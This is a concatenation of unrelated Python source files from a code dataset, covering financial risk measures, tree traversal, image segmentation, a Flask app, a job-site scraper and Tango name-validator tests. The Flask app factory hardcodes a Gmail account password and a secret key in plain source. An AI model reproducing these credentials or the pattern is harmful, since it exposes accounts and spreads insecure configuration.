result","sub_path":"commons/generic_dao.py","file_name":"generic_dao.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"468993750","text":"\"\"\"\nCopyright 2019 Goldman Sachs.\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n    http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing,\nsoftware distributed under the License is distributed on an\n\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied. 
See the License for the\nspecific language governing permissions and limitations\nunder the License.\n\"\"\"\nimport copy\nfrom typing import Optional, Union\n\nimport pandas as pd\nfrom gs_quant.base import Market, EnumBase\nfrom gs_quant.common import AssetClass, CurrencyParameter, FiniteDifferenceParameter, AggregationLevel\nfrom gs_quant.context_base import do_not_serialise\nfrom gs_quant.target.risk import RiskMeasure as __RiskMeasure, RiskMeasureType, RiskMeasureUnit\n\nDEPRECATED_MEASURES = {'IRDeltaParallelLocalCcy': 'IRDelta',\n 'InflationDeltaParallelLocalCcy': 'InflationDelta',\n 'IRXccyDeltaParallelLocalCurrency': 'IRXccyDelta',\n 'IRVegaParallelLocalCcy': 'IRVega',\n }\n\n\nclass RiskMeasure(__RiskMeasure):\n\n def __lt__(self, other):\n return self.name < other.name\n\n def __repr__(self):\n return self.name or self.measure_type.name\n\n @property\n @do_not_serialise\n def pricing_context(self):\n from gs_quant.markets import PricingContext\n return PricingContext.current\n\n\nclass __RelativeRiskMeasure(RiskMeasure):\n\n def __init__(self,\n to_market: Market,\n asset_class: Union[AssetClass, str] = None,\n measure_type: Union[RiskMeasureType, str] = None,\n unit: Union[RiskMeasureUnit, str] = None,\n value: Union[float, str] = None,\n name: str = None):\n super().__init__(asset_class=asset_class, measure_type=measure_type, unit=unit, value=value, name=name)\n self.__to_market = to_market\n\n @property\n @do_not_serialise\n def pricing_context(self):\n from gs_quant.markets import PricingContext, RelativeMarket\n current = PricingContext.current\n return current.clone(market=RelativeMarket(from_market=current.market, to_market=self.__to_market))\n\n\nclass PnlExplain(__RelativeRiskMeasure):\n \"\"\" Pnl Explained \"\"\"\n\n def __init__(self, to_market: Market):\n super().__init__(to_market, measure_type=RiskMeasureType.PnlExplain, name=RiskMeasureType.PnlExplain.value)\n\n\nclass PnlExplainClose(PnlExplain):\n\n def __init__(self):\n from gs_quant.markets import CloseMarket\n super().__init__(CloseMarket())\n\n\nclass PnlExplainLive(PnlExplain):\n\n def __init__(self):\n from gs_quant.markets import LiveMarket\n super().__init__(LiveMarket())\n\n\nclass PnlPredictLive(__RelativeRiskMeasure):\n \"\"\" Pnl Predicted \"\"\"\n\n def __init__(self):\n from gs_quant.markets import LiveMarket\n super().__init__(LiveMarket(), measure_type=RiskMeasureType.PnlPredict, name=RiskMeasureType.PnlPredict.value)\n\n\ndef __risk_measure_with_doc_string(name: str,\n doc: str,\n measure_type: RiskMeasureType,\n asset_class: Optional[AssetClass] = None,\n unit: Optional[RiskMeasureUnit] = None,\n parameter_type: str = None\n ) -> RiskMeasure:\n if parameter_type == \"Currency\":\n measure = RiskMeasureWithCurrencyParameter(measure_type=measure_type, asset_class=asset_class, unit=unit,\n name=name)\n elif parameter_type == \"FiniteDifference\":\n measure = RiskMeasureWithFiniteDifferenceParameter(measure_type=measure_type, asset_class=asset_class,\n unit=unit, name=name)\n else:\n measure = RiskMeasure(measure_type=measure_type, asset_class=asset_class, unit=unit, name=name)\n measure.__doc__ = doc\n return measure\n\n\nclass ParameterisedRiskMeasure(RiskMeasure):\n def __init__(self, name: str = None, asset_class: Union[AssetClass, str] = None,\n measure_type: Union[RiskMeasureType, str] = None, unit: Union[RiskMeasureUnit, str] = None,\n value: Union[float, str] = None, parameter_type: str = None):\n super().__init__(asset_class=asset_class, measure_type=measure_type, unit=unit, value=value, 
name=name)\n self.parameter_type = parameter_type\n\n def __repr__(self):\n name = self.name or self.measure_type.name\n params = None\n if self.parameters:\n params = self.parameters.as_dict()\n params.pop('parameter_type', None)\n sorted_keys = sorted(params.keys(), key=lambda x: x.lower())\n params = ', '.join(\n [f'{k}:{params[k].value if isinstance(params[k], EnumBase) else params[k]}' for k in sorted_keys])\n return name + '(' + params + ')' if params else name\n\n def parameter_is_empty(self):\n return self.parameters is None\n\n\nclass RiskMeasureWithCurrencyParameter(ParameterisedRiskMeasure):\n def __call__(self, currency: str = None):\n # hack to prevent ParameterisedRiskMeasure input into pandas LocIndexer as a callable function that returns\n # output for indexing (https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.loc.html)\n if isinstance(currency, pd.DataFrame):\n return self\n\n clone = copy.copy(self)\n parameter = CurrencyParameter(value=currency)\n clone.parameters = parameter\n return clone\n\n\nclass RiskMeasureWithFiniteDifferenceParameter(ParameterisedRiskMeasure):\n def __call__(self, currency: str = None,\n aggregation_level: Union[AggregationLevel, str] = None, local_curve: bool = None,\n finite_difference_method: Union[FiniteDifferenceParameter, str] = None,\n mkt_marking_mode: str = None, bump_size: float = None, scale_factor: float = None, name: str = None):\n # hack to prevent ParameterisedRiskMeasure input into pandas LocIndexer as a callable function that returns\n # output for indexing (https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.loc.html)\n if isinstance(currency, pd.DataFrame):\n return self\n\n clone = copy.copy(self)\n if name:\n clone.name = name\n parameter = FiniteDifferenceParameter(aggregation_level=aggregation_level, currency=currency,\n local_curve=local_curve, bump_size=bump_size,\n finite_difference_method=finite_difference_method,\n scale_factor=scale_factor, mkt_marking_mode=mkt_marking_mode)\n clone.parameters = parameter\n return clone\n\n\nDollarPrice = __risk_measure_with_doc_string('DollarPrice', 'Present value in USD', RiskMeasureType.Dollar_Price)\nPrice = __risk_measure_with_doc_string('Price', 'Present value in local currency', RiskMeasureType.PV,\n parameter_type=\"Currency\")\n\nForwardPrice = __risk_measure_with_doc_string(\n 'ForwardPrice',\n 'Forward price',\n RiskMeasureType.Forward_Price,\n unit=RiskMeasureUnit.BPS)\nBaseCPI = __risk_measure_with_doc_string('BaseCPI', 'Base CPI level', RiskMeasureType.BaseCPI)\nTheta = __risk_measure_with_doc_string('Theta', '1 day Theta', RiskMeasureType.Theta)\nEqDelta = __risk_measure_with_doc_string(\n 'EqDelta',\n 'Equity Delta',\n RiskMeasureType.Delta,\n asset_class=AssetClass.Equity)\nEqGamma = __risk_measure_with_doc_string(\n 'EqGamma',\n 'Equity Gamma',\n RiskMeasureType.Gamma,\n asset_class=AssetClass.Equity)\nEqVega = __risk_measure_with_doc_string('EqVega', 'Equity Vega', RiskMeasureType.Vega, asset_class=AssetClass.Equity)\nEqSpot = __risk_measure_with_doc_string(\n 'EqSpot',\n 'Equity Spot Level',\n RiskMeasureType.Spot, asset_class=AssetClass.Equity)\nEqAnnualImpliedVol = __risk_measure_with_doc_string(\n 'EqAnnualImpliedVol',\n 'Equity Annual Implied Volatility (%)',\n RiskMeasureType.Annual_Implied_Volatility,\n asset_class=AssetClass.Equity,\n unit=RiskMeasureUnit.Percent)\nCommodDelta = __risk_measure_with_doc_string(\n 'CommodDelta',\n 'Commodity Delta',\n RiskMeasureType.Delta,\n 
asset_class=AssetClass.Commod)\nCommodTheta = __risk_measure_with_doc_string(\n 'CommodTheta',\n 'Commodity Theta',\n RiskMeasureType.Theta,\n asset_class=AssetClass.Commod)\nCommodVega = __risk_measure_with_doc_string(\n 'CommodVega',\n 'Commodity Vega',\n RiskMeasureType.Vega,\n asset_class=AssetClass.Commod)\nFairVolStrike = __risk_measure_with_doc_string(\n 'FairVolStrike',\n 'Fair Volatility Strike Value of a Variance Swap',\n RiskMeasureType.FairVolStrike)\nFairVarStrike = __risk_measure_with_doc_string(\n 'FairVarStrike',\n 'Fair Variance Strike Value of a Variance Swap',\n RiskMeasureType.FairVarStrike)\nFXDelta = __risk_measure_with_doc_string('FXDelta', 'FX Delta', RiskMeasureType.Delta, asset_class=AssetClass.FX,\n parameter_type=\"FiniteDifference\")\nFXGamma = __risk_measure_with_doc_string('FXGamma', 'FX Gamma', RiskMeasureType.Gamma, asset_class=AssetClass.FX)\nFXVega = __risk_measure_with_doc_string('FXVega', 'FX Vega', RiskMeasureType.Vega, asset_class=AssetClass.FX,\n parameter_type=\"FiniteDifference\")\nFXSpot = __risk_measure_with_doc_string('FXSpot', 'FX Spot Rate', RiskMeasureType.Spot, asset_class=AssetClass.FX)\nFXAnnualATMImpliedVol = __risk_measure_with_doc_string(\n 'FXAnnualATMImpliedVol',\n 'FX Annual ATM Implied Volatility',\n RiskMeasureType.Annual_ATM_Implied_Volatility,\n asset_class=AssetClass.FX,\n unit=RiskMeasureUnit.Percent)\nFXAnnualImpliedVol = __risk_measure_with_doc_string(\n 'FXAnnualImpliedVol',\n 'FX Annual Implied Volatility',\n RiskMeasureType.Annual_Implied_Volatility,\n asset_class=AssetClass.FX,\n unit=RiskMeasureUnit.Percent)\nIRBasis = __risk_measure_with_doc_string(\n 'IRBasis',\n 'Interest Rate Basis',\n RiskMeasureType.Basis,\n asset_class=AssetClass.Rates, parameter_type=\"FiniteDifference\")\nIRBasisParallel = IRBasis(aggregation_level=AggregationLevel.Asset, name='IRBasisParallel')\nInflationDelta = __risk_measure_with_doc_string(\n 'InflationDelta',\n 'Inflation Delta',\n RiskMeasureType.InflationDelta,\n asset_class=AssetClass.Rates, parameter_type='FiniteDifference')\nInflationDeltaParallel = InflationDelta(aggregation_level=AggregationLevel.Type, name='InflationDeltaParallel')\nInflationDeltaParallelLocalCcy = InflationDelta(aggregation_level=AggregationLevel.Type, currency='local',\n name='InflationDeltaParallelLocalCcy')\nIRDelta = __risk_measure_with_doc_string(\n 'IRDelta',\n 'Interest Rate Delta',\n RiskMeasureType.Delta,\n asset_class=AssetClass.Rates, parameter_type=\"FiniteDifference\")\nIRDeltaParallel = IRDelta(aggregation_level=AggregationLevel.Asset, name='IRDeltaParallel')\nIRDeltaLocalCcy = IRDelta(currency='local', name='IRDeltaLocalCcy')\nIRDeltaParallelLocalCcy = IRDelta(aggregation_level=AggregationLevel.Type, currency='local',\n name='IRDeltaParallelLocalCcy')\nIRDiscountDeltaParallel = __risk_measure_with_doc_string(\n 'IRDiscountDeltaParallel',\n 'Parallel Discount Delta',\n RiskMeasureType.ParallelDiscountDelta,\n asset_class=AssetClass.Rates)\nIRDiscountDeltaParallelLocalCcy = __risk_measure_with_doc_string(\n 'IRDiscountDeltaParallelLocalCcy',\n 'Parallel Discount Delta (Local Ccy)',\n RiskMeasureType.ParallelDiscountDeltaLocalCcy,\n asset_class=AssetClass.Rates)\nIRXccyDelta = __risk_measure_with_doc_string(\n 'IRXccyDelta',\n 'Cross-ccy Delta',\n RiskMeasureType.XccyDelta,\n asset_class=AssetClass.Rates, parameter_type='FiniteDifference')\nIRXccyDeltaParallel = IRXccyDelta(aggregation_level=AggregationLevel.Type, name='IRXccyDeltaParallel')\nIRXccyDeltaParallelLocalCurrency = 
IRXccyDelta(aggregation_level=AggregationLevel.Type, currency='local',\n name='IRXccyDeltaParallelLocalCurrency')\nIRGammaParallel = __risk_measure_with_doc_string(\n 'IRGammaParallel',\n 'Interest Rate Parallel Gamma',\n RiskMeasureType.ParallelGamma,\n asset_class=AssetClass.Rates)\nIRGammaParallelLocalCcy = __risk_measure_with_doc_string(\n 'IRGammaParallelLocalCcy',\n 'Interest Rate Parallel Gamma (Local Ccy)',\n RiskMeasureType.ParallelGammaLocalCcy,\n asset_class=AssetClass.Rates)\nIRVega = __risk_measure_with_doc_string(\n 'IRVega',\n 'Interest Rate Vega',\n RiskMeasureType.Vega,\n asset_class=AssetClass.Rates, parameter_type=\"FiniteDifference\")\nIRVegaParallel = IRVega(aggregation_level=AggregationLevel.Asset, name='IRVegaParallel')\nIRVegaLocalCcy = IRVega(currency='local', name='IRVegaLocalCcy')\nIRVegaParallelLocalCcy = IRVega(aggregation_level=AggregationLevel.Type, currency='local',\n name='IRVegaParallelLocalCcy')\nIRAnnualImpliedVol = __risk_measure_with_doc_string(\n 'IRAnnualImpliedVol',\n 'Interest Rate Annual Implied Volatility (%)',\n RiskMeasureType.Annual_Implied_Volatility,\n asset_class=AssetClass.Rates,\n unit=RiskMeasureUnit.Percent)\nIRAnnualATMImpliedVol = __risk_measure_with_doc_string(\n 'IRAnnualATMImpliedVol',\n 'Interest Rate Annual Implied At-The-Money Volatility (%)',\n RiskMeasureType.Annual_ATMF_Implied_Volatility,\n asset_class=AssetClass.Rates,\n unit=RiskMeasureUnit.Percent)\nIRDailyImpliedVol = __risk_measure_with_doc_string(\n 'IRDailyImpliedVol',\n 'Interest Rate Daily Implied Volatility (bps)',\n RiskMeasureType.Daily_Implied_Volatility,\n asset_class=AssetClass.Rates,\n unit=RiskMeasureUnit.BPS)\nIRSpotRate = __risk_measure_with_doc_string(\n 'IRSpotRate',\n 'At-The-Money Spot Rate (%)',\n RiskMeasureType.Spot_Rate,\n asset_class=AssetClass.Rates,\n unit=RiskMeasureUnit.Percent)\nIRFwdRate = __risk_measure_with_doc_string(\n 'IRFwdRate',\n 'Par Rate (%)',\n RiskMeasureType.Forward_Rate,\n asset_class=AssetClass.Rates,\n unit=RiskMeasureUnit.Percent)\nCDDelta = __risk_measure_with_doc_string(\n 'CDDelta',\n 'Credit Delta',\n RiskMeasureType.Delta,\n asset_class=AssetClass.Credit)\nCDVega = __risk_measure_with_doc_string(\n 'CDVega',\n 'Credit Vega',\n RiskMeasureType.Vega,\n asset_class=AssetClass.Credit)\nCDGamma = __risk_measure_with_doc_string(\n 'CDGamma',\n 'Credit Gamma',\n RiskMeasureType.Gamma,\n asset_class=AssetClass.Credit)\nCDTheta = __risk_measure_with_doc_string(\n 'CDTheta',\n 'Credit Theta',\n RiskMeasureType.Theta,\n asset_class=AssetClass.Credit)\nCDATMSpread = __risk_measure_with_doc_string(\n 'CDATMSpread',\n 'Credit ATM Spread',\n RiskMeasureType.ATM_Spread,\n asset_class=AssetClass.Credit)\nCRIFIRCurve = __risk_measure_with_doc_string(\n 'CRIFIRCurve',\n 'CRIF IR Curve',\n RiskMeasureType.CRIF_IRCurve)\nResolvedInstrumentValues = __risk_measure_with_doc_string(\n 'ResolvedInstrumentBaseValues',\n 'Resolved InstrumentBase Values',\n RiskMeasureType.Resolved_Instrument_Values\n)\nDescription = __risk_measure_with_doc_string(\n 'Description',\n 'Description',\n RiskMeasureType.Description\n)\nCashflows = __risk_measure_with_doc_string(\n 'Cashflows',\n 'Cashflows',\n RiskMeasureType.Cashflows\n)\nMarketDataAssets = __risk_measure_with_doc_string(\n 'MarketDataAssets',\n 'MarketDataAssets',\n RiskMeasureType.Market_Data_Assets\n)\nMarketData = __risk_measure_with_doc_string(\n 'Market Data',\n 'Market Data map of coordinates and values',\n RiskMeasureType.Market_Data\n)\nParSpread = __risk_measure_with_doc_string(\n 
'ParSpread',\n    'Par Spread',\n    RiskMeasureType.Spread,\n    asset_class=AssetClass.Rates)\n","sub_path":"gs_quant/risk/measures.py","file_name":"measures.py","file_ext":"py","file_size_in_byte":16172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"410385319","text":"class Solution:\n    #2014-10-15\n    #Binary Tree Preorder Traversal\n    # @param root, a tree node\n    # @return a list of integers\n    def preorderTraversal(self, root):\n        stack = []\n        stack.append(root)\n        x = []\n        while(len(stack) > 0):\n            t = stack.pop()\n            if t is not None:\n                x.append(t.val)\n                if t.right is not None:\n                    stack.append(t.right)\n                if t.left is not None:\n                    stack.append(t.left) \n        return x","sub_path":"LeetCode/Solved/oj144.py","file_name":"oj144.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390965697","text":"# AI HW2\n# class for containing data about each piece of the tower\n# Amanda Adkins, Sam Mailand\n# Stephen Long, Alec Thompson\n\n# class for each piece of a tower (for puzzle 3)\nclass TowerPiece:\n\tDOOR = 0\n\tWALL = 1\n\tLOOKOUT = 2\n\n\t# initialization for pieces\n\t# line string is the string read from the file that contains data about the piece\n\t# other parameters are for creating an object not from a file (for autogeneration of sample files)\n\tdef __init__(self, lineString, pieceType=0, width=0, strength=0, cost=0):\n\t\t# if we're making the tower piece from the text file\n\t\tif (lineString is not None):\n\t\t\t# parse the attributes\n\t\t\twords = lineString.split(\", \")\n\t\t\tif (len(words) != 4):\n\t\t\t\t# shouldn't happen\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\t# get the piece type\n\t\t\t\tif (words[0] == \"Door\"):\n\t\t\t\t\tself.pieceType = TowerPiece.DOOR\n\t\t\t\telif (words[0] == \"Wall\"):\n\t\t\t\t\tself.pieceType = TowerPiece.WALL\n\t\t\t\telif (words[0] == \"Lookout\"):\n\t\t\t\t\tself.pieceType = TowerPiece.LOOKOUT\n\t\t\t\t# set the width\n\t\t\t\tself.width = int(words[1])\n\t\t\t\t# set the strength\n\t\t\t\tself.strength = int(words[2])\n\t\t\t\t# set the cost\n\t\t\t\tself.cost = int(words[3])\n\t\telse:\n\t\t\tself.pieceType = pieceType\n\t\t\tself.width = width\n\t\t\tself.strength = strength\n\t\t\tself.cost = cost\n\n\tdef getCost(self):\n\t\treturn self.cost\n\n\tdef getPieceType(self):\n\t\treturn self.pieceType\n\n\tdef getWidth(self):\n\t\treturn self.width\n\n\tdef getStrength(self):\n\t\treturn self.strength\n\n\t# get the string representation to print out to the user\n\tdef getStringRepresentation(self):\n\t\tstringRep = \"\"\n\t\tif (self.getPieceType() == TowerPiece.DOOR):\n\t\t\tstringRep += \"Door\"\n\t\telif (self.getPieceType() == TowerPiece.LOOKOUT):\n\t\t\tstringRep += \"Lookout\"\n\t\telif (self.getPieceType() == TowerPiece.WALL):\n\t\t\tstringRep += \"Wall\"\n\n\t\tstringRep += \", \"\n\t\tstringRep += \"Width: \"\n\t\tstringRep += str(self.width)\n\n\t\tstringRep += \", \"\n\t\tstringRep += \"Strength: \"\n\t\tstringRep += str(self.strength)\n\n\t\tstringRep += \", \"\n\t\tstringRep += \"Cost: \"\n\t\tstringRep += str(self.cost)\n\n\t\treturn stringRep\n\t\t\n\t# get the string representation to write to the file\n\tdef getString(self):\n\t\tstringRep = \"\"\n\t\tif (self.getPieceType() == TowerPiece.DOOR):\n\t\t\tstringRep += \"Door\"\n\t\telif (self.getPieceType() == TowerPiece.LOOKOUT):\n\t\t\tstringRep += \"Lookout\"\n\t\telif (self.getPieceType() == TowerPiece.WALL):\n\t\t\tstringRep += \"Wall\"\n\t\tstringRep += \", 
\"\n\t\tstringRep += str(self.width)\n\t\tstringRep += \", \"\n\t\tstringRep += str(self.strength)\n\t\tstringRep += \", \"\n\t\tstringRep += str(self.cost)\n\t\tstringRep += \"\\n\"\n\t\treturn stringRep","sub_path":"2assignment/TowerPiece.py","file_name":"TowerPiece.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"638305556","text":"import numpy as np\nfrom KhawagaNeuralNetwork.layer import Layer\nfrom KhawagaNeuralNetwork.optimizer import optimizer\n\nclass SoftmaxLayer(Layer):\n def __init__(self,size,activation,lr=0.001,optimizer_name='GD',beta=1,raw=1,epsilon=1):\n super(). __init__(size,activation,lr=0.001,optimizer_name='GD',beta=1,raw=1,epsilon=1)\n\n def backward(self,y):\n error = 2 * (self.A - y) / self.A.shape[0] * self.activation(self.Z, derivative=True)\n change_w = np.outer(error, self.x)\n change_b = np.sum(error,keepdims=True)\n \n w=optimizer(self.W,self.lr,change_w)\n b=optimizer(self.b,self.lr,change_b)\n\n \n if self.optimizer_name== \"momentum_based\":\n self.W=w.momentum_based(self.beta)\n self.b=b.momentum_based(self.beta)\n elif self.optimizer_name==\"adagrad\":\n self.W=w.adagrad()\n self.b=b.adagrad()\n elif self.optimizer_name==\"RMSProp\":\n self.W=w.RMSProp(self.raw)\n self.b=b.RMSProp(self.raw)\n elif self.optimizer_name==\"adaDelta\":\n self.W=w.adaDelta(self.raw,self.epsilon)\n self.b=b.adaDelta(self.raw,self.epsilon)\n else: \n self.W=w.GD()\n self.b=b.GD()\n\n\n return np.dot(self.W.T, error)\n","sub_path":"KhawagaNeuralNetwork/softmax_layer.py","file_name":"softmax_layer.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"407305921","text":"\"\"\" This module defines the image processing pipeline as described in README.md \"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom skimage.filters import threshold_otsu\nfrom skimage.io import imread\nfrom skimage.morphology import binary_closing, remove_small_objects\nfrom skimage.measure import label, regionprops\nfrom skimage.color import label2rgb\nfrom skimage.util import img_as_ubyte\n\ndef processing_pipe(image_path):\n \"\"\" This is the actual image processing function.\n It encapsulates every processing step from reading the file,\n converting it to a numpy array, cropping, performing morphological\n operations computing all region's properties (get_regions_props())\n and returning the resulting properties as well as initial the\n initial image, the intermediate and final images. 
\"\"\"\n\n # reading data, converting to greyscale, converting to numpy array\n img = imread(image_path)\n greyscale_array = np.array(img)\n \n # cropping out the interesting part & extracting green channel (rgb -> grey)\n greyscale_cropped_image = greyscale_array[:, :, 1]\n\n # segmenting using otsu's method\n global_threshold = threshold_otsu(greyscale_cropped_image)\n\n # filling small holes\n greyscale_closed = binary_closing(np.invert(greyscale_cropped_image > global_threshold))\n\n # removing small objects outside of leaf\n greyscale_closed_rem = remove_small_objects(greyscale_closed, min_size=128, connectivity=2)\n\n # label the binary image and combine with rgb representation\n labelled_image = label(greyscale_closed_rem)\n image_label_overlay = label2rgb(labelled_image, image=greyscale_cropped_image)\n\n # compute region's properties\n regions_properties = get_regions_props(labelled_image) \n\n # returning images after converting segmented image back to 8 bit format & labelling it\n image_data = { \"original_img\": img,\n \"greyscale_img\": greyscale_cropped_image,\n \"segmented_ubyte_img_bw\": img_as_ubyte(greyscale_closed_rem),\n \"labelled_image\": labelled_image,\n \"labelled_ubyte_img_rgb\": img_as_ubyte(image_label_overlay),\n \"regions_properties\": regions_properties }\n\n return image_data\n\n\ndef get_regions_props(img):\n \"\"\" The function computes the region's properties of a labelled image.\n It returns a pandas DataFrame with the properties eccentricity,\n extent, solidity and roundness (manually computed).\n Other properties from the regionprops function or custom ones\n could be included here as well. \"\"\"\n\n # getting region's properties and filtering by extent\n regions_properties = regionprops(img, cache=True)\n\n # creating dataframe\n dataframe = pd.DataFrame(columns=[\"eccentricity\", \"extent\", \"solidity\", \"roundness\"])\n\n # getting the props for the only region\n for props in regions_properties:\n # manually calculating roundness\n roundness = 4 * np.pi * props.area / props.perimeter**2\n\n # appending data to dataframe\n dataframe.loc[len(dataframe)+1] = [props.eccentricity, props.extent, props.solidity, roundness]\n\n return dataframe\n","sub_path":"src/pipe.py","file_name":"pipe.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12324137","text":"from flask import Flask\nfrom os.path import dirname, abspath, join\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nfrom flask_bcrypt import Bcrypt\nfrom flask_mail import Mail\n\ndb = SQLAlchemy()\nlogin_manager = LoginManager()\nbcrypt = Bcrypt()\nmail=Mail()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config['SECRET_KEY'] = 'dfdQbTOExternjy5xmCNaA'\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n app.config['MAIL_SERVER'] = 'smtp.googlemail.com'\n app.config['MAIL_PORT'] = 587\n app.config['MAIL_USE_TLS'] = True\n app.config['MAIL_USERNAME'] = 'gradlab63@gmail.com'\n app.config['MAIL_PASSWORD'] = 'RandomPassword123!'\n mail.init_app(app)\n CWD = dirname(abspath(__file__))\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + join(CWD, 'gradlab.sqlite')\n db.init_app(app)\n login_manager.init_app(app)\n bcrypt.init_app(app)\n login_manager.login_view = 'main.login'\n from app.models import Account, Test, Question\n from populate_db import populate_db\n with app.app_context():\n db.create_all()\n populate_db()\n\n # Register Blueprints\n from 
app.main.routes import bp_main\n app.register_blueprint(bp_main)\n from app.errors.handlers import errors\n app.register_blueprint(errors)\n return app\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"313710383","text":"# Alex Ruan\n#Ascend-Descend\n#14 September 2018\n\nimport sys\nimport math as m\nimport random as r\n\nx = float(sys.argv[1])\ny = float(sys.argv[2])\nz = float(sys.argv[3])\n\nif x < y < z or x > y > z:\n print(\"True\")\n print(x, y, z)\n\nelse:\n print(\"False\")\n print(x, y, z)\n\ninput()\n","sub_path":"ascend-descend.py","file_name":"ascend-descend.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"46076544","text":"# -*- coding: utf-8 -*-\nimport os, sys\nimport datetime\nimport json\nfrom bson import json_util\nfrom pyquery import PyQuery as pq\nfrom bs4 import BeautifulSoup\nimport lxml.html\nimport time\n\nimport lagou_job_parser\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../../../util'))\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../../support'))\nimport loghelper\nimport util, download, name_helper,url_helper\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../util'))\nimport parser_db_util\n\n#logger\nloghelper.init_logger(\"lagou_company_parser\", stream=True)\nlogger = loghelper.get_logger(\"lagou_company_parser\")\n\nSOURCE = 13050 #Lgou\nTYPE = 36001 #公司信息\naa =0\ncnt = 0\ndownload_crawler = download.DownloadCrawler(use_proxy=True)\n\ndef process():\n global aa,cnt\n logger.info(\"lagou_company_parser begin...\")\n while True:\n\n items = parser_db_util.find_all_limit(SOURCE, TYPE, aa,1000)\n #items = [parser_db_util.find_process_one(SOURCE, TYPE, 128040)]\n aa += 1000\n for item in items:\n\n r = parse_company(item)\n\n if r[\"status\"] == \"Sub_company\":\n #parser_db_util.update_active(SOURCE, item[\"key\"], 'N')\n #parser_db_util.update_processed(item[\"_id\"])\n logger.info(\"Fullname %s, %s\", r[\"name\"], item[\"url\"])\n cnt += 1\n continue\n\n #exit()\n\n if len(items) == 0:\n break\n\n logger.info(\"total : %s\", cnt)\n #break\n\n logger.info(\"lagou_company_parser end.\")\n\n\ndef parse_company(item):\n if item is None:\n return None\n\n #logger.info(\"*** base ***\")\n company_key = item[\"key\"]\n html = item[\"content\"]\n #logger.info(html)\n d = pq(html)\n\n logo = d('.top_info_wrap > img').attr('src')\n if logo.startswith(\"http\") or logo.startswith(\"https\"):\n pass\n else:\n logo = \"http:\"+logo\n\n name = d('.company_main > h1 > a').text()\n fullName = d('.company_main > h1 > a').attr('title')\n fullName = name_helper.company_name_normalize(fullName)\n if name is None or fullName is None:\n return {\n \"status\": \"No_Name\",\n }\n if len(name) > len(fullName):\n name = fullName\n\n if fullName.find(\"分公司\") >= 0:\n return {\n \"status\": \"Sub_company\",\n \"name\": fullName\n }\n\n return {\n \"status\": \"good\"\n }\n\n\n\nif __name__ == \"__main__\":\n while True:\n process()\n 
time.sleep(60*30)","sub_path":"data/spider2/parser/recruit/lagou/lagou_company_full_name_check.py","file_name":"lagou_company_full_name_check.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"186568231","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/taurus/core/tango/test/test_tangovalidator.py\n# Compiled at: 2019-08-19 15:09:29\n\"\"\"Test for taurus.core.tango.test.test_tangovalidator...\"\"\"\n__docformat__ = 'restructuredtext'\nimport unittest\nfrom taurus.core.test import valid, invalid, names, AbstractNameValidatorTestCase\nfrom taurus.core.tango.tangovalidator import TangoAuthorityNameValidator, TangoDeviceNameValidator, TangoAttributeNameValidator\nimport PyTango, socket\n__PY_TANGO_HOST = PyTango.ApiUtil.get_env_var('TANGO_HOST')\nhost, port = __PY_TANGO_HOST.split(':')\n__TANGO_HOST = ('{0}:{1}').format(socket.getfqdn(host), port)\n\n@valid(name='tango://foo:10000')\n@invalid(name='tango:foo')\n@invalid(name='tango:foo:10000')\n@invalid(name='tango://foo:10000/')\n@invalid(name='tango://foo:10000/?')\n@invalid(name='tango://foo:bar')\n@invalid(name='tango://foo:10000/foo')\n@names(name='tango://foo:123', out=('tango://foo:123', '//foo:123', 'foo:123'))\n@names(name='//foo:123', out=('tango://foo:123', '//foo:123', 'foo:123'))\nclass TangoAuthValidatorTestCase(AbstractNameValidatorTestCase, unittest.TestCase):\n validator = TangoAuthorityNameValidator\n\n\n@valid(name='tango:foo', groups={'devname': 'foo', '_devalias': 'foo', \n '_devslashname': None})\n@valid(name='tango:a/b/c', groups={'devname': 'a/b/c', '_devalias': None, \n '_devslashname': 'a/b/c'})\n@valid(name='tango://foo:123/a/b/c', groups={'devname': 'a/b/c', '_devalias': None, \n '_devslashname': 'a/b/c'})\n@valid(name='tango:a/b/ c', groups={'devname': 'a/b/ c'})\n@invalid(name='tango:/a/b/c?')\n@valid(name='tango://a/b/c', 